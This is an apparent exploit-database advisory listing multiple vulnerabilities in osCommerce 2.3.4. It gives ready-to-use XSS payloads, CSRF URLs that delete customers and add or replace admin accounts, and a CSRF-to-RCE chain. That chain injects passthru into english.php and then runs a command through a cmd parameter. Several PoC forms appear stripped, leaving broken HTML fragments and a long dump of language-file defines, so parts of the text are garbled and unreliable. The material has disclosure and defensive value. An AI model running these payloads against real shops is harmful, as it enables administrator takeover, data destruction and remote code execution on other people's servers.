#Title: osCommerce 2.3.4 - Multiple vulnerabilities #Date: 10.07.14 #Affected versions: => 2.3.4 (latest atm) #Vendor: oscommerce.com #Tested on: Apache 2.2.22 [at] Debian #Contact: smash [at] devilteam.pl #Cross Site Scripting 1. Reflected XSS -> Send Email Vulnerable parameters - customers_email_address & mail_sent_to a) POST Request: POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1 Host: localhost customers_email_address=&from=fuck@shit.up&subject=test&message=test Response: HTTP/1.1 200 OK (...) Customer:
(...) CSRF PoC:
b) GET Request: GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1 Host: localhost Response: (...) Success&nbps;Notice: Email sent to: (...) 2. Persistent XSS via CSRF -> Newsletter Request: POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1 Host: localhost module=newsletter&title=&content= CSRF PoC:
First popbox (123) will be executed whenever someone will visit newsletters page: localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php (...) Preview&nbps; (...) (...) Second one, will be executed whenever someone will visit specific newsletter page: localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview (...) (...) 3. Persistent XSS via CSRF -> Banner manager Vulnerable parameter - banners_title PoC:
JS will be executed whenever someone will visitd banner manager page or specific banner page. localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID] Response: View Banner&nbps; group 4. Persistent XSS via CSRF -> Locations / Taxes Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones. PoC:
JS will be executed whenever someone will visitd 'countries' tab: localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php Response: (...) AAAA xs sed (...) 5. Persistent XSS via CSRF -> Localization a) Currencies PoC:
" />
JS will be executed whenever someone will visit currencies tab: localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php Response: (...) (default) 666 666.00000000 (...) b) Languages PoC:
" />
JS will be executed whenever someone will visit langauges tab: localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php Response: (...) 66 (...) c) Orders status Request: POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1 Host: localhost orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS Response: (...) '>"><>XSS (...) '>"><>XSS (...)
" title="">" />&nbps;'>"><>XSS
<>XSS/images/icon.gif'>"><>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
<>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
" title="">" />&nbps;'>"><>XSS
<>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
English&nbps;'>"><>XSS #Boring CSRF - Remove any item from cart localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product - Add item to cart localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product - Remove address book entry localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1 - Remove specific country localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm - Remove specific currency localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm - Change store credentials I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF. localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php ...and a lot more. #Less boring CSRF - Send email as admin -> Send email It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
" />
- Delete / Edit specific user Remove user PoC: localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm Edit user PoC:
- Add / Edit / Delete admin Add admin account:
Change admin (set new password):
Remove admin: localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm - RCE via CSRF -> Define Languages It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included. localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a PoC:
%d to %d (of %d products)'); define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying %d to %d (of %d orders)'); define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying %d to %d (of %d reviews)'); define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying %d to %d (of %d new products)'); define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying %d to %d (of %d specials)'); define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page'); define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page'); define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page'); define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page'); define('PREVNEXT_TITLE_PAGE_NO', 'Page %d'); define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages'); define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages'); define('PREVNEXT_BUTTON_FIRST', '<>]'); define('PREVNEXT_BUTTON_LAST', 'LAST>>'); define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address'); define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book'); define('IMAGE_BUTTON_BACK', 'Back'); define('IMAGE_BUTTON_BUY_NOW', 'Buy Now'); define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address'); define('IMAGE_BUTTON_CHECKOUT', 'Checkout'); define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order'); define('IMAGE_BUTTON_CONTINUE', 'Continue'); define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping'); define('IMAGE_BUTTON_DELETE', 'Delete'); define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account'); define('IMAGE_BUTTON_HISTORY', 'Order History'); define('IMAGE_BUTTON_LOGIN', 'Sign In'); define('IMAGE_BUTTON_IN_CART', 'Add to Cart'); define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications'); define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find'); define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications'); define('IMAGE_BUTTON_REVIEWS', 'Reviews'); define('IMAGE_BUTTON_SEARCH', 'Search'); define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options'); define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend'); define('IMAGE_BUTTON_UPDATE', 'Update'); define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart'); define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review'); define('SMALL_IMAGE_BUTTON_DELETE', 'Delete'); define('SMALL_IMAGE_BUTTON_EDIT', 'Edit'); define('SMALL_IMAGE_BUTTON_VIEW', 'View'); define('ICON_ARROW_RIGHT', 'more'); define('ICON_CART', 'In Cart'); define('ICON_ERROR', 'Error'); define('ICON_SUCCESS', 'Success'); define('ICON_WARNING', 'Warning'); define('TEXT_GREETING_PERSONAL', 'Welcome back %s! Would you like to see which new products are available to purchase?'); define('TEXT_GREETING_PERSONAL_RELOGON', 'If you are not %s, please log yourself in with your account information.'); define('TEXT_GREETING_GUEST', 'Welcome Guest! Would you like to log yourself in? Or would you prefer to create an account?'); define('TEXT_SORT_PRODUCTS', 'Sort products '); define('TEXT_DESCENDINGLY', 'descendingly'); define('TEXT_ASCENDINGLY', 'ascendingly'); define('TEXT_BY', ' by '); define('TEXT_REVIEW_BY', 'by %s'); define('TEXT_REVIEW_WORD_COUNT', '%s words'); define('TEXT_REVIEW_RATING', 'Rating: %s [%s]'); define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s'); define('TEXT_NO_REVIEWS', 'There are currently no product reviews.'); define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.'); define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate'); define('TEXT_REQUIRED', 'Required'); define('ERROR_TEP_MAIL', 'TEP ERROR: Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.'); define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.'); define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.'); define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.'); define('FOOTER_TEXT_BODY', 'Copyright © ' . date('Y') . ' ' . STORE_NAME . '
Powered by osCommerce'); ?> " />